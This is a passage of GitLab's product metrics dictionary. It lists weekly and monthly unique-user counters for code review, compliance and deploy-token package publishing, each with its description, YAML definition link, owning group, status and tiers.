comment in a merge request + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184405_i_code_review_user_edit_multiline_mr_comment_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_edit_multiline_mr_comment_weekly` + +Count of unique users per week who edit a multiline comment in a merge request + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184403_i_code_review_user_edit_multiline_mr_comment_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_labels_changed_monthly` + +Count of unique users per month who changed labels of a MR + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210302110607_i_code_review_user_labels_changed_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_labels_changed_weekly` + +Count of unique users per week who changed labels of a MR + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210302110548_i_code_review_user_labels_changed_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_load_conflict_ui_monthly` + +Count of unique users per week who load the conflict resolution page + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210514013549_i_code_review_user_load_conflict_ui_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_load_conflict_ui_weekly` + +Count of unique users per week who load the conflict resolution page + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210514013544_i_code_review_user_load_conflict_ui_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_marked_as_draft_monthly` + +Count of unique users per month who mark a merge request as a draft + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184422_i_code_review_user_marked_as_draft_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_marked_as_draft_weekly` + +Count of unique users per week who mark a merge request as a draft + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184420_i_code_review_user_marked_as_draft_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_merge_mr_monthly` + +Count of unique users per month who merged a MR + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216175144_i_code_review_user_merge_mr_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_merge_mr_weekly` + +Count of unique users per week who merged a MR + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216175142_i_code_review_user_merge_mr_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_milestone_changed_monthly` + +Count of unique users per month who changed milestone of a MR + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210302110520_i_code_review_user_milestone_changed_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_milestone_changed_weekly` + +Count of unique users per week who changed milestone of a MR + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210302110403_i_code_review_user_milestone_changed_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_mr_discussion_locked_monthly` + +Count of unique users per month who locked a MR + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210301103859_i_code_review_user_mr_discussion_locked_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_mr_discussion_locked_weekly` + +Count of unique users per week who locked a MR + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210302105318_i_code_review_user_mr_discussion_locked_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_mr_discussion_unlocked_monthly` + +Count of unique users per month who unlocked a MR + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210301103925_i_code_review_user_mr_discussion_unlocked_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_mr_discussion_unlocked_weekly` + +Count of unique users per week who unlocked a MR + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210302105258_i_code_review_user_mr_discussion_unlocked_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_publish_review_monthly` + +Count of unique users per month who publish their review as part of a merge request review + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184357_i_code_review_user_publish_review_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_publish_review_weekly` + +Count of unique users per week who publish their review as part of a merge request review + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184355_i_code_review_user_publish_review_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_remove_mr_comment_monthly` + +Count of unique users per month who removed a comment on a MR + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216175156_i_code_review_user_remove_mr_comment_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_remove_mr_comment_weekly` + +Count of unique users per month who removed a comment on a MR + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216175154_i_code_review_user_remove_mr_comment_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_remove_multiline_mr_comment_monthly` + +Count of unique users per month who remove a multiline comment in a merge request + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184409_i_code_review_user_remove_multiline_mr_comment_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_remove_multiline_mr_comment_weekly` + +Count of unique users per week who remove a multiline comment in a merge request + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184407_i_code_review_user_remove_multiline_mr_comment_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_reopen_mr_monthly` + +Count of unique users per month who reopened a MR + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216175140_i_code_review_user_reopen_mr_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_reopen_mr_weekly` + +Count of unique users per week who reopened a MR + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216175138_i_code_review_user_reopen_mr_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_resolve_conflict_monthly` + +Count of unique users per week who attempt to resolve a conflict through the ui + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210514013545_i_code_review_user_resolve_conflict_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_resolve_conflict_weekly` + +Count of unique users per week who attempt to resolve a conflict through the ui + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210514013545_i_code_review_user_resolve_conflict_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_resolve_thread_monthly` + +Count of unique users per month who resolve a thread in a merge request + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184330_i_code_review_user_resolve_thread_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_resolve_thread_weekly` + +Count of unique users per week who resolve a thread in a merge request + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184328_i_code_review_user_resolve_thread_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_review_requested_monthly` + +Count of unique users per month who request a review of a merge request + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184430_i_code_review_user_review_requested_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_review_requested_weekly` + +Count of unique users per week who request a review of a merge request + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184428_i_code_review_user_review_requested_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_reviewers_changed_monthly` + +Count of unique users per month who changed reviewers of a MR + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210302114219_i_code_review_user_reviewers_changed_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_reviewers_changed_weekly` + +Count of unique users per week who changed reviewers of a MR + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210302114235_i_code_review_user_reviewers_changed_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_single_file_diffs_monthly` + +Count of unique users per month with diffs viewed file by file + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216175124_i_code_review_user_single_file_diffs_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_single_file_diffs_weekly` + +Count of unique users per week with diffs viewed file by file + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216175122_i_code_review_user_single_file_diffs_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_time_estimate_changed_monthly` + +Count of unique users per month who changed time estimate of a MR + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210301102134_i_code_review_user_time_estimate_changed_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_time_estimate_changed_weekly` + +Count of unique users per week who changed time estimate of a MR + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210302103539_i_code_review_user_time_estimate_changed_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_time_spent_changed_monthly` + +Count of unique users per month who changed time spent on a MR + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210301102204_i_code_review_user_time_spent_changed_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_time_spent_changed_weekly` + +Count of unique users per week who changed time spent on a MR + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210302103615_i_code_review_user_time_spent_changed_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_toggled_task_item_status_monthly` + +Count of unique users per month who toggled a task item in a merge request + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184312_i_code_review_user_toggled_task_item_status_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_toggled_task_item_status_weekly` + +Count of unique users per week who toggled a task item in a merge request + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184310_i_code_review_user_toggled_task_item_status_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_unapprove_mr_monthly` + +Count of unique users per month who unapprove a merge request + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184326_i_code_review_user_unapprove_mr_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_unapprove_mr_weekly` + +Count of unique users per week who unapprove a merge request + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184324_i_code_review_user_unapprove_mr_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_unmarked_as_draft_monthly` + +Count of unique users per month who unmark a merge request as a draft + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184426_i_code_review_user_unmarked_as_draft_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_unmarked_as_draft_weekly` + +Count of unique users per week who unmark a merge request as a draft + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184424_i_code_review_user_unmarked_as_draft_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_unresolve_thread_monthly` + +Count of unique users per month who unresolve a thread in a merge request + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184334_i_code_review_user_unresolve_thread_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_unresolve_thread_weekly` + +Count of unique users per week who unresolve a thread in a merge request + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184332_i_code_review_user_unresolve_thread_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_vs_code_api_request_monthly` + +Count of unique users per month who use GitLab Workflow for VS Code + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184446_i_code_review_user_vs_code_api_request_monthly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.code_review.i_code_review_user_vs_code_api_request_weekly` + +Count of unique users per week who use GitLab Workflow for VS Code + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184444_i_code_review_user_vs_code_api_request_weekly.yml) + +Group: `group::code review` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.compliance.a_compliance_audit_events_api_monthly` + +Unique users that have used the Audit Events API in a given month. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216183942_a_compliance_audit_events_api_monthly.yml) + +Group: `group::compliance` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.compliance.a_compliance_audit_events_api_weekly` + +Unique users that have used the Audit Events API in a given week. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216183940_a_compliance_audit_events_api_weekly.yml) + +Group: `group::compliance` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.compliance.compliance_total_unique_counts_monthly` + +Unique count of compliance actions in a given month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216183946_compliance_total_unique_counts_monthly.yml) + +Group: `group::compliance` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.compliance.compliance_total_unique_counts_weekly` + +Unique count of compliance actions in a given week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216183944_compliance_total_unique_counts_weekly.yml) + +Group: `group::compliance` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.compliance.g_compliance_audit_events_monthly` + +Unique users who have viewed the audit event screen in a given month. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216183930_g_compliance_audit_events_monthly.yml) + +Group: `group::compliance` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.compliance.g_compliance_audit_events_weekly` + +Number of unique visitors to group-level audit events screen in a given week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216183928_g_compliance_audit_events_weekly.yml) + +Group: `group::compliance` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.compliance.g_compliance_dashboard_monthly` + +Unique users who have viewed the compliance dashboard in a given month. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216183926_g_compliance_dashboard_monthly.yml) + +Group: `group::compliance` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.compliance.g_compliance_dashboard_weekly` + +Unique users who have looked at the compliance dashboard in a given week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216183924_g_compliance_dashboard_weekly.yml) + +Group: `group::compliance` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.compliance.i_compliance_audit_events_monthly` + +Unique users that have viewed the instance-level audit events screen + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216183934_i_compliance_audit_events_monthly.yml) + +Group: `group::compliance` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.compliance.i_compliance_audit_events_weekly` + +Unique users that have viewed the instance-level audit events screen + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216183932_i_compliance_audit_events_weekly.yml) + +Group: `group::compliance` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `redis_hll_counters.compliance.i_compliance_credential_inventory_monthly` + +Unique users who have viewed the credential inventory in a given month. + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216183938_i_compliance_credential_inventory_monthly.yml) + +Group: `group::compliance` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `ultimate` + +### `redis_hll_counters.compliance.i_compliance_credential_inventory_weekly` + +Unique visitors to the credential inventory screen in a given week + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216183936_i_compliance_credential_inventory_weekly.yml) + +Group: `group::compliance` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `ultimate` + +### `redis_hll_counters.deploy_token_packages.deploy_token_packages_total_unique_counts_monthly` + +A monthly count of packages published to the registry using a deploy token + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184850_deploy_token_packages_total_unique_counts_monthly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.deploy_token_packages.deploy_token_packages_total_unique_counts_weekly` + +A weekly count of packages published to the registry using a deploy token + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184848_deploy_token_packages_total_unique_counts_weekly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.deploy_token_packages.i_package_composer_deploy_token_monthly` + +A monthly count of Composer packages published to the registry using a deploy token + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184806_i_package_composer_deploy_token_monthly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.deploy_token_packages.i_package_composer_deploy_token_weekly` + +A weekly count of Composer packages published to the registry using a deploy token + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184805_i_package_composer_deploy_token_weekly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.deploy_token_packages.i_package_conan_deploy_token_monthly` + +A monthly count of Conan packages published to the registry using a deploy token + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184810_i_package_conan_deploy_token_monthly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.deploy_token_packages.i_package_conan_deploy_token_weekly` + +A weekly count of Conan packages published to the registry using a deploy token + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184808_i_package_conan_deploy_token_weekly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.deploy_token_packages.i_package_container_deploy_token_monthly` + +A monthly count of container images published to the registry using a deploy token + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184814_i_package_container_deploy_token_monthly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.deploy_token_packages.i_package_container_deploy_token_weekly` + +A weekly count of container images published to the registry using a deploy token + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184812_i_package_container_deploy_token_weekly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.deploy_token_packages.i_package_debian_deploy_token_monthly` + +A monthly count of Debian packages published to the registry using a deploy token + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184818_i_package_debian_deploy_token_monthly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.deploy_token_packages.i_package_debian_deploy_token_weekly` + +A weekly count of Debian packages published to the registry using a deploy token + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184816_i_package_debian_deploy_token_weekly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.deploy_token_packages.i_package_generic_deploy_token_monthly` + +A monthly count of generic packages published to the registry using a deploy token + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184822_i_package_generic_deploy_token_monthly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `broken` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.deploy_token_packages.i_package_generic_deploy_token_weekly` + +A weekly count of generic packages published to the registry using a deploy token + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184820_i_package_generic_deploy_token_weekly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.deploy_token_packages.i_package_golang_deploy_token_monthly` + +A monthly count of Go modules published to the registry using a deploy token + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184826_i_package_golang_deploy_token_monthly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.deploy_token_packages.i_package_golang_deploy_token_weekly` + +A weekly count of Go modules published to the registry using a deploy token + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184824_i_package_golang_deploy_token_weekly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `deprecated` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.deploy_token_packages.i_package_helm_deploy_token_monthly` + +Distinct Helm pakages deployed in recent 28 days + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210517074859_i_package_helm_deploy_token_monthly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `implemented` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.deploy_token_packages.i_package_helm_deploy_token_weekly` + +Distinct Helm pakages deployed in recent 7 days + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210517074851_i_package_helm_deploy_token_weekly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `implemented` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.deploy_token_packages.i_package_maven_deploy_token_monthly` + +A monthly count of Maven packages published to the registry using a deploy token + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184830_i_package_maven_deploy_token_monthly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.deploy_token_packages.i_package_maven_deploy_token_weekly` + +A weekly count of Maven packages published to the registry using a deploy token + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216184828_i_package_maven_deploy_token_weekly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `redis_hll_counters.deploy_token_packages.i_package_npm_deploy_token_monthly` + +A monthly count of npm packages published to the registry using a deploy token + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216184834_i_package_npm_deploy_token_monthly.yml) + +Group: `group::package` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### 